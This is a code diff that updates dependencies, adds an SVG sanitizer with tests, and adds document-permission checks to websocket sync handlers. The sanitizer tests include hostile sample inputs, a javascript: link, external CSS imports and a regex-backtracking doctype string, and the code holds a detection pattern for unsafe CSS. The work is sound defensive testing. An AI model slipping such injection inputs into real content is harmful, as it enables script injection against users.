+1 -1
@@ -43,7 +43,7 @@
"@blocksuite/store": "workspace:*",
"@preact/signals-core": "^1.8.0",
"@types/lodash-es": "^4.17.12",
- "dompurify": "^3.3.0",
+ "dompurify": "^3.4.11",
"html2canvas": "^1.4.1",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
+2 -1
@@ -23,7 +23,7 @@
"@types/lodash-es": "^4.17.12",
"@types/mdast": "^4.0.4",
"bytes": "^3.1.2",
- "dompurify": "^3.3.0",
+ "dompurify": "^3.4.11",
"fractional-indexing": "^3.2.0",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
@@ -46,6 +46,7 @@
"remark-parse": "^11.0.0",
"remark-stringify": "^11.0.0",
"rxjs": "^7.8.2",
+ "tldts": "^7.0.19",
"ts-pattern": "^5.1.0",
"unified": "^11.0.5",
"unist-util-visit": "^5.0.0",
@@ -0,0 +1,191 @@
/**
* @vitest-environment happy-dom
*/
import { describe, expect, test } from 'vitest';
import { sanitizeSvg } from '../../utils/svg.js';
type HappyDOMWindow = Window & {
happyDOM: {
setURL: (url: string) => void;
};
};
function setLocation(url: string) {
(window as unknown as HappyDOMWindow).happyDOM.setURL(url);
}
function svgDataUrl(svg: string) {
const bytes = new TextEncoder().encode(svg);
let binary = '';
bytes.forEach(byte => {
binary += String.fromCharCode(byte);
});
return `data:image/svg+xml;base64,${btoa(binary)}`;
}
function decodeSvgDataUrl(dataUrl: string) {
const base64 = dataUrl.split(',')[1];
return new TextDecoder().decode(
Uint8Array.from(atob(base64), char => char.charCodeAt(0))
);
}
describe('sanitizeSvg', () => {
test('wraps DOMPurify svg fragments back into an svg root', () => {
const sanitized = sanitizeSvg(
'<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100"><rect width="100" height="100"></rect></svg>'
);
expect(sanitized).toContain('<svg');
expect(sanitized).toContain('width="100"');
expect(sanitized).toContain('<rect');
});
test('accepts svg documents with xml and doctype prefixes', () => {
const sanitized = sanitizeSvg(`<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<rect width="100" height="100"></rect>
</svg>`);
expect(sanitized).toContain('<svg');
expect(sanitized).toContain('width="100"');
expect(sanitized).toContain('<rect');
expect(sanitized).not.toContain('<!DOCTYPE');
});
test('rejects non-svg roots', () => {
expect(sanitizeSvg('<div><svg></svg></div>')).toBe('');
});
test('rejects malformed doctype prefixes without regexp backtracking', () => {
const maliciousPrefix = '<!doctype' + '?><!doctype'.repeat(10_000);
expect(sanitizeSvg(`${maliciousPrefix}<div></div>`)).toBe('');
});
test('keeps internal glyph references and safe image data urls', () => {
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<defs><path id="glyph-a" d="M0 0h10v10z"></path></defs>
<use href="#glyph-a"></use>
<use xlink:href="#glyph-a"></use>
<a xlink:href="https://typst.app/docs/tutorial"><path d="M0 0h10v10z"></path></a>
<image href="data:image/png;base64,AAAA" width="10" height="10"></image>
</svg>
`);
expect(sanitized).toContain('href="#glyph-a"');
expect(sanitized).toContain('xlink:href="#glyph-a"');
expect(sanitized).toContain('xlink:href="https://typst.app/docs/tutorial"');
expect(sanitized).toContain('data:image/png;base64,AAAA');
});
test('removes external glyph references and unsafe css', () => {
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<style>@import "https://example.com/style.css"; .a { fill: #000; }</style>
<use href="https://example.com/glyph.svg#x"></use>
<use xlink:href="https://example.com/glyph.svg#x"></use>
<a xlink:href="javascript:alert(1)"><path d="M0 0h10v10z"></path></a>
<image href="https://example.com/image.png" width="10" height="10"></image>
<path style="fill: url(https://example.com/pattern.svg#x)" d="M0 0h10v10z"></path>
</svg>
`);
expect(sanitized).not.toContain('https://example.com');
expect(sanitized).not.toContain('javascript:');
expect(sanitized).not.toContain('@import');
expect(sanitized).not.toContain('url(');
});
test('removes links sharing the current registrable domain', () => {
setLocation('https://sub.example.co.uk/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="https://sub.example.co.uk/docs"><path d="M0 0h10v10z"></path></a>
<a href="https://other.example.co.uk/docs"><path d="M0 0h10v10z"></path></a>
<a xlink:href="https://example.com/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('https://sub.example.co.uk/docs');
expect(sanitized).not.toContain('https://other.example.co.uk/docs');
expect(sanitized).toContain('https://example.com/docs');
});
test('keeps private suffix sibling domains separate', () => {
setLocation('https://foo.github.io/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="https://foo.github.io/docs"><path d="M0 0h10v10z"></path></a>
<a href="https://bar.github.io/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('https://foo.github.io/docs');
expect(sanitized).toContain('https://bar.github.io/docs');
});
test('handles local hostnames by exact hostname', () => {
setLocation('http://localhost:3000/workspace');
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<a xlink:href="http://localhost:8080/docs"><path d="M0 0h10v10z"></path></a>
<a href="http://share.localhost/docs"><path d="M0 0h10v10z"></path></a>
<a href="http://127.0.0.1/docs"><path d="M0 0h10v10z"></path></a>
</svg>
`);
expect(sanitized).not.toContain('http://localhost:8080/docs');
expect(sanitized).toContain('http://share.localhost/docs');
expect(sanitized).toContain('http://127.0.0.1/docs');
});
test('recursively sanitizes svg images', () => {
const nestedSvg = svgDataUrl(
'<svg xmlns="http://www.w3.org/2000/svg"><defs><path id="glyph-a" d="M0 0h10v10z"></path></defs><use href="#glyph-a"></use><use href="https://example.com/glyph.svg#x"></use></svg>'
);
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<image href="${nestedSvg}" width="10" height="10"></image>
</svg>
`);
const sanitizedImageHref = sanitized.match(/href="([^"]+)"/)?.[1];
expect(sanitizedImageHref).toMatch(/^data:image\/svg\+xml;base64,/);
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).toContain('<svg');
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).toContain('#glyph-a');
expect(decodeSvgDataUrl(sanitizedImageHref ?? '')).not.toContain(
'https://example.com'
);
});
test('removes svg images nested deeper than two levels', () => {
const thirdLevelSvg = svgDataUrl(
'<svg xmlns="http://www.w3.org/2000/svg"><rect width="10" height="10"></rect></svg>'
);
const secondLevelSvg = svgDataUrl(
`<svg xmlns="http://www.w3.org/2000/svg"><image href="${thirdLevelSvg}"></image></svg>`
);
const firstLevelSvg = svgDataUrl(
`<svg xmlns="http://www.w3.org/2000/svg"><image href="${secondLevelSvg}"></image></svg>`
);
const sanitized = sanitizeSvg(`
<svg xmlns="http://www.w3.org/2000/svg">
<image href="${firstLevelSvg}"></image>
</svg>
`);
const firstLevelHref = sanitized.match(/href="([^"]+)"/)?.[1];
const firstLevelSanitizedSvg = decodeSvgDataUrl(firstLevelHref ?? '');
const secondLevelHref = firstLevelSanitizedSvg.match(/href="([^"]+)"/)?.[1];
const secondLevelSanitizedSvg = decodeSvgDataUrl(secondLevelHref ?? '');
expect(firstLevelSanitizedSvg).toContain('<image');
expect(secondLevelSanitizedSvg).not.toContain('<image');
});
});
@@ -20,7 +20,6 @@ import {
type ToSliceSnapshotPayload,
type Transformer,
} from '@blocksuite/store';
- import DOMPurify from 'dompurify';
import pdfMake from 'pdfmake/build/pdfmake';
import type {
Content,
@@ -29,6 +28,7 @@ import type {
} from 'pdfmake/interfaces';
import { getNumberPrefix } from '../../utils';
+ import { sanitizeSvg } from '../../utils/svg.js';
import { resolveCssVariable } from './css-utils.js';
import { extractTextWithInline } from './delta-converter.js';
import {
@@ -746,9 +746,8 @@ export class PdfAdapter extends BaseAdapter<PdfAdapterFile> {
const trimmedText = text.trim();
if (trimmedText.startsWith('<svg')) {
- const svgContent = DOMPurify.sanitize(trimmedText, {
- USE_PROFILES: { svg: true },
- });
+ const svgContent = sanitizeSvg(trimmedText);
+ if (!svgContent) throw new Error('Invalid SVG image asset');
const svgDimensions = extractSvgDimensions(svgContent);
const dimensions = calculateImageDimensions(
blockWidth,
@@ -23,6 +23,7 @@ export * from './reordering';
export * from './safe-html';
export * from './signal';
export * from './string';
export * from './svg';
export * from './title';
export * from './url';
export * from './virtual-padding';
+294
@@ -0,0 +1,294 @@
import type { Config } from 'dompurify';
import DOMPurify from 'dompurify';
import { parse } from 'tldts';
type SanitizeSvgOptions = {
svg?: Config;
foreignObjectHtml?: Config;
};
const MAX_NESTED_SVG_IMAGE_DEPTH = 2;
const DEFAULT_SVG_SANITIZE_CONFIG: Config = {
USE_PROFILES: { svg: true },
ADD_TAGS: ['use'],
ADD_ATTR: ['href', 'xlink:href', 'class', 'style', 'id'],
};
const DEFAULT_FOREIGN_OBJECT_HTML_SANITIZE_CONFIG: Config = {
USE_PROFILES: { html: true },
};
const SAFE_LINK_PROTOCOLS = new Set(['http:', 'https:', 'mailto:']);
const SVG_DATA_URL_PATTERN =
/^data:image\/svg\+xml(?:;charset=[^;,]+)?(?<base64>;base64)?,(?<data>[\s\S]*)$/i;
const SAFE_IMAGE_DATA_URL_PATTERN =
/^data:image\/(?:png|jpe?g|gif|webp|svg\+xml);base64,[a-z0-9+/=]+$/i;
const UNSAFE_CSS_PATTERN =
/(?:url\s*\(|@import|javascript\s*:|expression\s*\(|-moz-binding)/i;
const SVG_ROOT_ATTRIBUTES = [
'class',
'data-height',
'data-width',
'height',
'preserveAspectRatio',
'viewBox',
'width',
'xmlns',
'xmlns:h5',
'xmlns:xlink',
];
function getAttribute(element: Element, attribute: string) {
return (
element.getAttribute(attribute) ??
element.getAttribute(attribute.toLowerCase())
);
}
function getSvgSanitizeConfig(options?: SanitizeSvgOptions) {
return {
...DEFAULT_SVG_SANITIZE_CONFIG,
...options?.svg,
};
}
function getForeignObjectHtmlSanitizeConfig(options?: SanitizeSvgOptions) {
return {
...DEFAULT_FOREIGN_OBJECT_HTML_SANITIZE_CONFIG,
...options?.foreignObjectHtml,
};
}
function isXmlWhitespace(char: string) {
return (
char === ' ' ||
char === '\n' ||
char === '\r' ||
char === '\t' ||
char === '\f'
);
}
function skipXmlWhitespace(value: string, index: number) {
while (index < value.length && isXmlWhitespace(value[index])) {
index++;
}
return index;
}
function startsWithIgnoreCase(value: string, search: string, index: number) {
return value.slice(index, index + search.length).toLowerCase() === search;
}
function getSvgRootStartIndex(value: string) {
let index = skipXmlWhitespace(value, 0);
if (startsWithIgnoreCase(value, '<?xml', index)) {
const declarationEnd = value.indexOf('?>', index + 5);
if (declarationEnd === -1) return -1;
index = skipXmlWhitespace(value, declarationEnd + 2);
}
if (startsWithIgnoreCase(value, '<!doctype', index)) {
const doctypeEnd = value.indexOf('>', index + 9);
if (doctypeEnd === -1) return -1;
index = skipXmlWhitespace(value, doctypeEnd + 1);
}
if (!startsWithIgnoreCase(value, '<svg', index)) return -1;
const next = value[index + 4];
return next === '>' || (next !== undefined && isXmlWhitespace(next))
? index
: -1;
}
function hasSvgRoot(value: string) {
return getSvgRootStartIndex(value) !== -1;
}
function getOriginalSvgRoot(svg: string, parser: DOMParser) {
const root = parser.parseFromString(svg, 'image/svg+xml').documentElement;
if (root?.tagName.toLowerCase() === 'svg') {
return root;
}
if (!hasSvgRoot(svg)) {
return null;
}
return parser.parseFromString(svg, 'text/html').querySelector('svg');
}
function ensureSvgRoot(
originalRoot: Element | null,
sanitized: string,
parser: DOMParser
) {
if (hasSvgRoot(sanitized)) {
const sanitizedDoc = parser.parseFromString(sanitized, 'image/svg+xml');
const sanitizedRoot = sanitizedDoc.documentElement;
return sanitizedRoot?.tagName.toLowerCase() === 'svg'
? sanitizedRoot
: null;
}
const svgDoc = parser.parseFromString('<svg></svg>', 'image/svg+xml');
const svgRoot = svgDoc.documentElement;
SVG_ROOT_ATTRIBUTES.forEach(attribute => {
const value = originalRoot ? getAttribute(originalRoot, attribute) : null;
if (value) {
svgRoot.setAttribute(attribute, value);
}
});
svgRoot.innerHTML = sanitized;
return svgRoot;
}
function sanitizeForeignObjects(
root: ParentNode,
options?: SanitizeSvgOptions
) {
root.querySelectorAll('foreignObject, foreignobject').forEach(element => {
element.innerHTML = DOMPurify.sanitize(
element.innerHTML,
getForeignObjectHtmlSanitizeConfig(options)
);
});
}
function getSiteDomain(hostname: string) {
return (
parse(hostname, { allowPrivateDomains: true }).domain ??
hostname.toLowerCase()
);
}
function isSameSiteDomain(url: URL) {
if (typeof location === 'undefined') return false;
return getSiteDomain(url.hostname) === getSiteDomain(location.hostname);
}
function isSafeLinkUrl(value: string) {
try {
const url = new URL(value);
return SAFE_LINK_PROTOCOLS.has(url.protocol) && !isSameSiteDomain(url);
} catch {
return false;
}
}
function isSafeHref(element: Element, value: string) {
if (value.startsWith('#')) return true;
const tagName = element.tagName.toLowerCase();
if (tagName === 'use') return false;
if (tagName === 'image') return SAFE_IMAGE_DATA_URL_PATTERN.test(value);
if (tagName === 'a') return isSafeLinkUrl(value);
return false;
}
function decodeSvgDataUrl(value: string) {
const groups = value.match(SVG_DATA_URL_PATTERN)?.groups;
if (!groups) return null;
try {
if (groups.base64) {
return new TextDecoder().decode(
Uint8Array.from(atob(groups.data), char => char.charCodeAt(0))
);
}
return decodeURIComponent(groups.data);
} catch {
return null;
}
}
function encodeSvgDataUrl(svg: string) {
const binary = Array.from(new TextEncoder().encode(svg), byte =>
String.fromCharCode(byte)
).join('');
return `data:image/svg+xml;base64,${btoa(binary)}`;
}
function getHrefAttributes(element: Element) {
return Array.from(element.attributes).filter(
attribute => attribute.name === 'href' || attribute.name === 'xlink:href'
);
}
function tightenSvgTree(
root: ParentNode,
options: SanitizeSvgOptions | undefined,
depth: number
) {
root.querySelectorAll('*').forEach(element => {
getHrefAttributes(element).forEach(attribute => {
const href = attribute.value.trim();
const nestedSvg =
element.tagName.toLowerCase() === 'image'
? decodeSvgDataUrl(href)
: null;
if (nestedSvg !== null) {
if (depth < MAX_NESTED_SVG_IMAGE_DEPTH) {
const sanitized = sanitizeSvgWithDepth(nestedSvg, options, depth + 1);
if (sanitized) {
element.setAttribute(attribute.name, encodeSvgDataUrl(sanitized));
return;
}
}
element.remove();
} else if (!isSafeHref(element, href)) {
element.removeAttribute(attribute.name);
}
});
const style = element.getAttribute('style');
if (style && UNSAFE_CSS_PATTERN.test(style)) {
element.removeAttribute('style');
}
if (
element.tagName.toLowerCase() === 'style' &&
UNSAFE_CSS_PATTERN.test(element.textContent ?? '')
) {
element.remove();
}
});
}
export function sanitizeSvg(svg: string, options?: SanitizeSvgOptions): string {
return sanitizeSvgWithDepth(svg, options, 0);
}
function sanitizeSvgWithDepth(
svg: string,
options: SanitizeSvgOptions | undefined,
depth: number
): string {
const svgConfig = getSvgSanitizeConfig(options);
if (
typeof DOMParser === 'undefined' ||
typeof XMLSerializer === 'undefined'
) {
const sanitized = DOMPurify.sanitize(svg, svgConfig);
if (typeof sanitized !== 'string' || !hasSvgRoot(sanitized)) {
return '';
}
return sanitized.trim();
}
const parser = new DOMParser();
const originalRoot = getOriginalSvgRoot(svg, parser);
if (!originalRoot) return '';
const sanitized = DOMPurify.sanitize(svg, svgConfig);
if (typeof sanitized !== 'string') return '';
const sanitizedRoot = ensureSvgRoot(originalRoot, sanitized, parser);
if (!sanitizedRoot) return '';
sanitizeForeignObjects(sanitizedRoot, options);
tightenSvgTree(sanitizedRoot, options, depth);
return new XMLSerializer().serializeToString(sanitizedRoot).trim();
}
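The `encodeSvgDataUrl` / `decodeSvgDataUrl` pair above re-embeds a sanitized nested SVG as a base64 data URL. The following is a minimal sketch of that round trip, not the project's implementation. `SVG_DATA_URL_SKETCH` is a hypothetical stand-in for `SVG_DATA_URL_PATTERN`, whose definition does not appear in this diff, and the `*Sketch` function names are illustrative only.

```typescript
// Hypothetical pattern (assumption): the real SVG_DATA_URL_PATTERN is not shown in the diff.
// It only needs the named groups `base64` and `data` that the decoder reads.
const SVG_DATA_URL_SKETCH =
  /^data:image\/svg\+xml(?<base64>;base64)?,(?<data>.*)$/is;

function encodeSvgDataUrlSketch(svg: string): string {
  // Convert to UTF-8 bytes first: btoa() only accepts code points up to 0xFF.
  const binary = Array.from(new TextEncoder().encode(svg), byte =>
    String.fromCharCode(byte)
  ).join('');
  return `data:image/svg+xml;base64,${btoa(binary)}`;
}

function decodeSvgDataUrlSketch(value: string): string | null {
  const groups = value.match(SVG_DATA_URL_SKETCH)?.groups;
  if (!groups) return null; // not an SVG data URL at all
  const data = groups.data ?? '';
  try {
    if (groups.base64) {
      // Reverse of the encoder: base64 -> byte string -> UTF-8 text.
      const bytes = Uint8Array.from(atob(data), char => char.charCodeAt(0));
      return new TextDecoder().decode(bytes);
    }
    return decodeURIComponent(data);
  } catch {
    // Malformed base64 or percent-encoding is treated as "not decodable".
    return null;
  }
}

const svg = '<svg xmlns="http://www.w3.org/2000/svg"><text>héllo ✓</text></svg>';
const roundTrip = decodeSvgDataUrlSketch(encodeSvgDataUrlSketch(svg));
const notSvg = decodeSvgDataUrlSketch('data:image/png;base64,AAAA');
```

Going through `TextEncoder` and `TextDecoder` keeps non-Latin-1 characters intact, which a bare `btoa(svg)` would reject.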
@@ -24,7 +24,7 @@
"@toeverything/theme": "^1.1.23",
"@types/lodash-es": "^4.17.12",
"fflate": "^0.8.2",
-"js-yaml": "^4.1.1",
+"js-yaml": "^4.2.0",
"jszip": "^3.10.1",
"lit": "^3.2.0",
"lodash-es": "^4.17.23",
+1 -1
@@ -19,7 +19,7 @@
"@preact/signals-core": "^1.8.0",
"@types/hast": "^3.0.4",
"@types/lodash-es": "^4.17.12",
-"dompurify": "^3.3.0",
+"dompurify": "^3.4.11",
"fractional-indexing": "^3.2.0",
"lib0": "^0.2.114",
"lit": "^3.2.0",
+1 -1
@@ -37,7 +37,7 @@
"@vanilla-extract/vite-plugin": "^5.0.0",
"@vitest/browser-playwright": "^4.1.8",
"playwright": "=1.58.2",
-"vite": "^7.2.7",
+"vite": "^7.3.5",
"vite-plugin-wasm": "^3.5.0",
"vitest": "^4.1.8"
},
+1 -1
@@ -34,7 +34,7 @@
"@types/micromatch": "^4.0.9",
"@vanilla-extract/vite-plugin": "^5.0.0",
"magic-string": "^0.30.21",
-"vite": "^7.2.7",
+"vite": "^7.3.5",
"vite-plugin-istanbul": "^7.2.1",
"vite-plugin-wasm": "^3.5.0",
"vite-plugin-web-components-hmr": "^0.1.3"
+17 -2
@@ -90,7 +90,7 @@
"typescript": "^5.9.3",
"typescript-eslint": "^8.55.0",
"unplugin-swc": "^1.5.9",
-"vite": "^7.2.7",
+"vite": "^7.3.5",
"vitest": "^4.1.8"
},
"packageManager": "yarn@4.13.0",
@@ -167,7 +167,22 @@
"typedarray": "npm:@nolyfill/typedarray@^1",
"macos-alias": "npm:@napi-rs/macos-alias@0.0.4",
"fs-xattr": "npm:@napi-rs/xattr@latest",
-"ioredis": "5.8.2",
+"@opentelemetry/core": "^2.8.0",
+"@opentelemetry/resources": "^2.8.0",
+"@opentelemetry/sdk-trace-base": "^2.8.0",
+"@tootallnate/once": "^2.0.1",
+"ioredis": "^5.11.1",
+"js-yaml@npm:^4.1.0": "^4.2.0",
+"js-yaml@npm:4.1.1": "^4.2.0",
+"multer": "^2.2.0",
+"protobufjs": "^7.6.4",
+"tar": "^7.5.16",
+"tmp": "^0.2.7",
+"ws@npm:^8.18.0": "^8.21.0",
+"ws@npm:^8.18.3": "^8.21.0",
+"ws@npm:^8.19.0": "^8.21.0",
+"ws@npm:8.20.1": "^8.21.0",
+"ws@npm:~8.17.1": "^8.21.0",
"decode-named-character-reference@npm:^1.0.0": "patch:decode-named-character-reference@npm%3A1.0.2#~/.yarn/patches/decode-named-character-reference-npm-1.0.2-db17a755fd.patch",
"@atlaskit/pragmatic-drag-and-drop": "patch:@atlaskit/pragmatic-drag-and-drop@npm%3A1.4.0#~/.yarn/patches/@atlaskit-pragmatic-drag-and-drop-npm-1.4.0-75c45f52d3.patch",
"yjs": "patch:yjs@npm%3A13.6.21#~/.yarn/patches/yjs-npm-13.6.21-c9f1f3397c.patch"
+1 -1
@@ -11,13 +11,13 @@ crate-type = ["cdylib"]
[dependencies]
aes-gcm = { workspace = true }
affine_common = { workspace = true, features = [
-"doc-loader",
"hashcash",
"napi",
"ydoc-loader",
] }
anyhow = { workspace = true }
chrono = { workspace = true }
+doc_extractor = { workspace = true }
file-format = { workspace = true }
hex = { workspace = true }
image = { workspace = true }
+2 -1
@@ -1,4 +1,5 @@
-use affine_common::{doc_loader::Doc, napi_utils::map_napi_err};
+use affine_common::napi_utils::map_napi_err;
+use doc_extractor::Doc;
use napi::{
Env, Result, Status, Task,
bindgen_prelude::{AsyncTask, Buffer},
+20 -19
@@ -45,27 +45,28 @@
"@node-rs/argon2": "^2.0.2",
"@node-rs/crc32": "^1.10.6",
"@opentelemetry/api": "^1.9.0",
-"@opentelemetry/core": "^2.7.1",
-"@opentelemetry/exporter-prometheus": "^0.218.0",
-"@opentelemetry/exporter-zipkin": "^2.7.1",
-"@opentelemetry/host-metrics": "^0.38.3",
-"@opentelemetry/instrumentation": "^0.218.0",
-"@opentelemetry/instrumentation-graphql": "^0.66.0",
-"@opentelemetry/instrumentation-http": "^0.218.0",
-"@opentelemetry/instrumentation-ioredis": "^0.66.0",
-"@opentelemetry/instrumentation-nestjs-core": "^0.64.0",
-"@opentelemetry/instrumentation-socket.io": "^0.65.0",
-"@opentelemetry/resources": "^2.7.1",
-"@opentelemetry/sdk-metrics": "^2.7.1",
-"@opentelemetry/sdk-node": "^0.218.0",
-"@opentelemetry/sdk-trace-node": "^2.7.1",
-"@opentelemetry/semantic-conventions": "^1.38.0",
+"@opentelemetry/core": "^2.8.0",
+"@opentelemetry/exporter-prometheus": "^0.219.0",
+"@opentelemetry/exporter-zipkin": "^2.8.0",
+"@opentelemetry/host-metrics": "^0.39.0",
+"@opentelemetry/instrumentation": "^0.219.0",
+"@opentelemetry/instrumentation-graphql": "^0.67.0",
+"@opentelemetry/instrumentation-http": "^0.219.0",
+"@opentelemetry/instrumentation-ioredis": "^0.67.0",
+"@opentelemetry/instrumentation-nestjs-core": "^0.65.0",
+"@opentelemetry/instrumentation-socket.io": "^0.66.0",
+"@opentelemetry/resources": "^2.8.0",
+"@opentelemetry/sdk-metrics": "^2.8.0",
+"@opentelemetry/sdk-node": "^0.219.0",
+"@opentelemetry/sdk-trace-base": "^2.8.0",
+"@opentelemetry/sdk-trace-node": "^2.8.0",
+"@opentelemetry/semantic-conventions": "^1.41.1",
"@prisma/client": "^6.6.0",
"@prisma/instrumentation": "^6.7.0",
"@queuedash/api": "^3.16.0",
"@react-email/components": "^0.5.7",
"@socket.io/redis-adapter": "^8.3.0",
-"bullmq": "5.77.6",
+"bullmq": "^5.79.0",
"commander": "^13.1.0",
"cookie-parser": "^1.4.7",
"cross-env": "^10.1.0",
@@ -83,7 +84,7 @@
"html-validate": "^9.0.0",
"htmlrewriter": "^0.0.12",
"http-errors": "^2.0.0",
-"ioredis": "^5.8.2",
+"ioredis": "^5.11.1",
"is-mobile": "^5.0.0",
"jose": "^6.1.3",
"jsonwebtoken": "^9.0.3",
@@ -92,7 +93,7 @@
"nanoid": "^5.1.6",
"nest-winston": "^1.9.7",
"nestjs-cls": "^6.0.0",
-"nodemailer": "^8.0.4",
+"nodemailer": "^9.0.0",
"on-headers": "^1.1.0",
"piscina": "^5.1.4",
"prisma": "^6.6.0",
@@ -102,7 +103,7 @@
"rxjs": "^7.8.2",
"semver": "^7.7.4",
"ses": "^1.15.0",
-"socket.io": "^4.8.1",
+"socket.io": "^4.8.3",
"stripe": "^17.7.0",
"tldts": "^7.0.19",
"winston": "^3.17.0",
@@ -176,6 +176,31 @@ function createYjsUpdateBase64() {
return Buffer.from(update).toString('base64');
}
async function createSnapshot(
db: PrismaClient,
input: {
workspaceId: string;
docId: string;
userId: string;
blob?: Buffer;
state?: Buffer;
updatedAt?: Date;
}
) {
await db.snapshot.create({
data: {
id: input.docId,
workspaceId: input.workspaceId,
blob: input.blob ?? Buffer.from([1, 1]),
state: input.state ?? Buffer.from([1, 1]),
createdAt: input.updatedAt ?? new Date(),
updatedAt: input.updatedAt ?? new Date(),
createdBy: input.userId,
updatedBy: input.userId,
},
});
}
async function ensureSyncActiveUsersTable(db: PrismaClient) {
await db.$executeRawUnsafe(`
CREATE TABLE IF NOT EXISTS sync_active_users_minutely (
@@ -612,17 +637,10 @@ test('workspace sync delete-doc should enforce doc permissions', async t => {
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
-await db.snapshot.create({
-data: {
-id: docId,
-workspaceId: workspace.id,
-blob: Buffer.from([1, 1]),
-state: Buffer.from([1, 1]),
-createdAt: new Date(),
-updatedAt: new Date(),
-createdBy: owner.id,
-updatedBy: owner.id,
-},
+await createSnapshot(db, {
+workspaceId: workspace.id,
+docId,
+userId: owner.id,
});
const socket = createClient(url, cookieHeader);
@@ -657,3 +675,206 @@ test('workspace sync delete-doc should enforce doc permissions', async t => {
socket.disconnect();
}
});
test('workspace sync load-doc should enforce doc read permissions', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const docId = 'private-load-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
await createSnapshot(db, {
workspaceId: workspace.id,
docId,
userId: owner.id,
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const error = getErrorResponse(
t,
await emitWithAck(socket, 'space:load-doc', {
spaceType: 'workspace',
spaceId: workspace.id,
docId,
})
);
t.true(error.message.includes('Doc.Read'));
} finally {
socket.disconnect();
}
});
test('workspace sync push-doc-update should enforce doc update permissions', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const docId = 'readonly-push-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, docId, DocRole.None);
await models.docUser.set(
workspace.id,
docId,
collaborator.id,
DocRole.Reader
);
await createSnapshot(db, {
workspaceId: workspace.id,
docId,
userId: owner.id,
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const error = getErrorResponse(
t,
await emitWithAck(socket, 'space:push-doc-update', {
spaceType: 'workspace',
spaceId: workspace.id,
docId,
update: createYjsUpdateBase64(),
})
);
t.true(error.message.includes('Doc.Update'));
const updates = await db.update.count({
where: {
workspaceId: workspace.id,
id: docId,
},
});
t.is(updates, 0);
} finally {
socket.disconnect();
}
});
test('workspace sync load-doc-timestamps should filter unreadable docs', async t => {
const db = app.get(PrismaClient);
const models = app.get(Models);
const { user: owner } = await login(app);
const { user: collaborator, cookieHeader } = await login(app);
const workspace = await models.workspace.create(owner.id);
const privateDocId = 'private-timestamp-doc';
const readableDocId = 'readable-timestamp-doc';
await models.workspaceUser.set(
workspace.id,
collaborator.id,
WorkspaceRole.Collaborator,
{
status: WorkspaceMemberStatus.Accepted,
}
);
await models.doc.setDefaultRole(workspace.id, privateDocId, DocRole.None);
await models.doc.setDefaultRole(workspace.id, readableDocId, DocRole.None);
await models.docUser.set(
workspace.id,
readableDocId,
collaborator.id,
DocRole.Reader
);
await createSnapshot(db, {
workspaceId: workspace.id,
docId: privateDocId,
userId: owner.id,
updatedAt: new Date('2026-01-01T00:00:00.000Z'),
});
await createSnapshot(db, {
workspaceId: workspace.id,
docId: readableDocId,
userId: owner.id,
updatedAt: new Date('2026-01-02T00:00:00.000Z'),
});
const socket = createClient(url, cookieHeader);
try {
await waitForConnect(socket);
const join = unwrapResponse(
t,
await emitWithAck<{ clientId: string; success: boolean }>(
socket,
'space:join',
{
spaceType: 'workspace',
spaceId: workspace.id,
clientVersion: '0.26.0',
}
)
);
t.true(join.success);
const timestamps = unwrapResponse(
t,
await emitWithAck<Record<string, number>>(
socket,
'space:load-doc-timestamps',
{
spaceType: 'workspace',
spaceId: workspace.id,
}
)
);
t.false(privateDocId in timestamps);
t.true(readableDocId in timestamps);
} finally {
socket.disconnect();
}
});
@@ -633,6 +633,7 @@ export class SpaceSyncGateway
@SubscribeMessage('space:load-doc')
async onLoadSpaceDoc(
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
@MessageBody()
{ spaceType, spaceId, docId, stateVector }: LoadDocMessage
): Promise<
@@ -641,6 +642,13 @@ export class SpaceSyncGateway
const id = new DocID(docId, spaceId);
const adapter = this.selectAdapter(client, spaceType);
adapter.assertIn(spaceId);
await this.assertDocActionAllowed(
spaceType,
user.id,
spaceId,
id.guid,
'Doc.Read'
);
const doc = await adapter.diff(
spaceId,
@@ -666,7 +674,7 @@ export class SpaceSyncGateway
@ConnectedSocket() client: Socket,
@CurrentUser() user: CurrentUser,
